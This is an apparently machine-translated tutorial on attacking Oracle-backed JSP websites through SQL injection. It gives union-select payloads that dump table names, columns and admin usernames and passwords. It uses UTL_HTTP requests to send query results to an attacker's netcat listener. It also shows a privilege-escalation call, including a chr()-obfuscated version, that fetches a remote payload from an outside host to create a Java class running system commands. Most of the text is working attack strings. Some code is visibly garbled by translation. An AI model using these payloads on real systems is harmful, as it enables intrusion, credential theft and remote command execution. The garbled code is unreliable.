Oracle injection Learning

Taskkill.net

We all know that oracle is relatively large, and the 11g installation program is about GB. You may encounter fewer oracle databases and better oracle + jsp combination...
The default users of the oracle system Library include sys, system, internal, and scott. The first three permissions are system permissions ..
Let's talk about database comments: access supports null and % 00 comments; mssql supports -- And; watching; mysql supports/*; oracle supports -- watching
Here we may say that if mssql is filtered out, how should we differentiate oracle from mssql databases? If it is an oracle database, oracle may often occur if an error occurs. for statements with errors in stored procedures such as odbc, you can also use; and user ()> 0 to determine mssql, so as to exclude the oracle database
Injection:
Method 1 dual system table
I. Determine whether to inject a number: and 1 = 1 and 1 = 0 between: and 1 = 1 and 1 = 0 search: xx % and 1 = 1 and % = xx % and 1 = 2 and % = (xx must be a string that exists on the page) text type: url % 2B returns normal url "% 2Basdfg Returns Error (asdfg is a random string)
2. determine the length. You can select union select null, null, null ..... (using null, null, null instead of, 3 is to avoid the type problem. After confirmation, you can replace the type one by one. oracle will not automatically match the type drop) order
3. Determine whether a dual table exists. (This article is intended to inject the dual table. If it does not exist, if it cannot run the tool, it will be physically active) url and exist (select * from dual)
Iv. Injection hypothesis: www.abc.com/abc.jsp? Id = 1 injection exists, and seven fields are all integer types. The index value is at 2.
1. Determine the oracle version www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, (select banner from sys. v _ $ version where rownum = 1), 3,4, 5, 6, 7 from dual
2. determine the current connected user www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, (select sys_context (userenv, current_user from dual), 3, 4, 5, 6, 7 from dual
3. Pop-up table www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, table_name, 3, 4, 5, 6, 7 from user_tables may have many tables, so the length is required, in some cases, some tables may not be displayed due to insufficient length. Assume that the preceding admin table exists.
4. What is the field www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, column_name, 3,4, 5, 6, 7 from cols where table_name = admin (assuming username and password)
5. What is the content of the field www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, username, 3, 4, 5, 6, 7 from admin www.abc.com/abc.jsp? Id = 1 and 1 = 2 union select 1, password, 3, 4, 5, 6, 7 from admin can also use concat ().

The second method works with the utl_http Stored Procedure
If you want to check whether the UTL_HTTP package exists, you can use the statement "select count (*) from all_objects where object_name = UTL_HTTP" to determine. OK. Since the returned information is reversed, we first use NC to listen locally, and then use "and UTL_HTTP.request (http: // IP: 2009/| (query statement )) = 1.
Local First nc-l-vv-p 2009, and then submit "and UTL_HTTP.request (http: // IP: 2009/| (select banner from sys. v _ $ version where rownum = 1) = 1 --"
Returns the database version. Now let's make a 1.1 Point Explosion. First blow the database, then blow the table, then blow the field (the above field has determined the field is USERNAME and PASSWORD), and finally blow the field value. Now let's get rid of the database and submit it.
"And UTL_HTTP.request (http: // ip: 2009/||( select owner from all_tables where rownum = 1) = 1 --"
Assume that the name of the first database is SYS. Continue to name the second database, submit
"And UTL_HTTP.request (http: // IP: 2009/| (select owner from all_tables where owner <> SYS and rownum = 1) = 1 --" and so on, all databases are exposed.
The statements for table explosion are as follows:
Submit "and UTL_HTTP.request (http: // IP: 2009/| (select TABLE_NAME from all_tables where owner = SYSand rownum = 1) = 1 --"
The first table in the SYS database is xxx. Continue submission
"And UTL_HTTP.request (http: // IP: 2009/|| (select TABLE_NAME from all_tables where owner = SYSand rownum = 1 and TABLE_NAME <> xxx) = 1 --"
In this way, all the tables in the SYS database are exposed. If you need to crack the number of columns in the table, you can use
"And UTL_HTTP.request (http: // IP: 2009/|| (select count (*) from user_tab_columns where table_name = table name) = 1 --"
Or you can use
"And UTL_HTTP.request (http: // IP: 2009/||( select * from user_tab_columns where table_name = table name and rownum = 1) = 1 --"
Use the second column name
"And UTL_HTTP.request (http: // IP: 2009/| (select * from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name popped up )) = 1 --"
And so on. Now let's continue to blow the user and password, and submit
"And UTL_HTTP.request (http: // IP: 2009 // | (select field name 1 from TBL_USER_MANAGER_BASE where rownum = 1) = 1 --"
Submit password cracking
"And UTL_HTTP.request (http: // IP: 2009 // | (select PASSWORD from TBL_USER_MANAGER_BASE where rownum = 1) = 1 --"
The first thing we think of is the SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function. We can use web injection to directly obtain system permissions! Let's take a look at the use of this function. As follows.
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); [multi-statement] END; --, SYS, 0, 1, 0)
Write our exploit in multiple statements, but this will cause a very large number of statements we construct. Therefore, we can use utl_http.request to obtain the exploit we put on the remote and on it. Here, the statements are constructed.
"And SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT". PUT (: P1); utl_http.request (http://www.li-tek.com/1.txt) END; --, SYS, 0, 1) = 0 --"
However, the page cannot be displayed after submission. And SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (chr (39) | chr (70) | chr (79), chr (79) | chr (39) | chr (44), chr (39) | chr (66) | chr (65) | chr (82) | chr (39) | chr (44) | chr (39) | chr (68) | chr (66) | chr (77) | chr (883) | chr (95) | chr (79) | chr (85) | chr (84) | chr (80) | chr (85) | chr (84) | chr (40) | chr (58) | chr (80) | chr (49)
| Chr (41) | chr (59) | utl_http.request (chr (39) | chr (104) | chr (116) | chr (116) | chr (112) | chr (58) | chr (47) | chr (47) | chr (119) | chr (119) | chr (119) | chr (46) | chr (108) | chr (105) | chr (45) | chr (116) | chr (101) | chr (107) | chr (46) | chr (99) | chr (111) | chr (109) | chr (47) | chr (49) | chr (46) | chr (116) | chr (120) | chr (116) | chr (39) | chr (69) | chr (78) | chr (68) | chr (59) | chr (45) | chr (45) | chr (39), chr (39) | chr (83) | chr (89) | chr (83) | chr (39), 0, chr (39) | chr (49) | chr (39), 0) = 0 --
The content of remote address 1.txt is
Execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and resolve java source named "JAVACMD" AS import java. lang. *; import java. io. *; public class JAVACMD {public static void execCommand (String command) throws IOException extends runtime.getruntime(cmd.exe c (command) ;};; END;

I don't know if you have noticed that the second injection statement used in the utl_http stored procedure is basically the same as that used in the dual table.
The first method is explained on the Black Hand of the first phase,

Article 2 Use the utl_http Stored Procedure for ReferenceThis article is illustrated with clear pictures

Html> http://www.bkjia.com/Article/200904/37078.html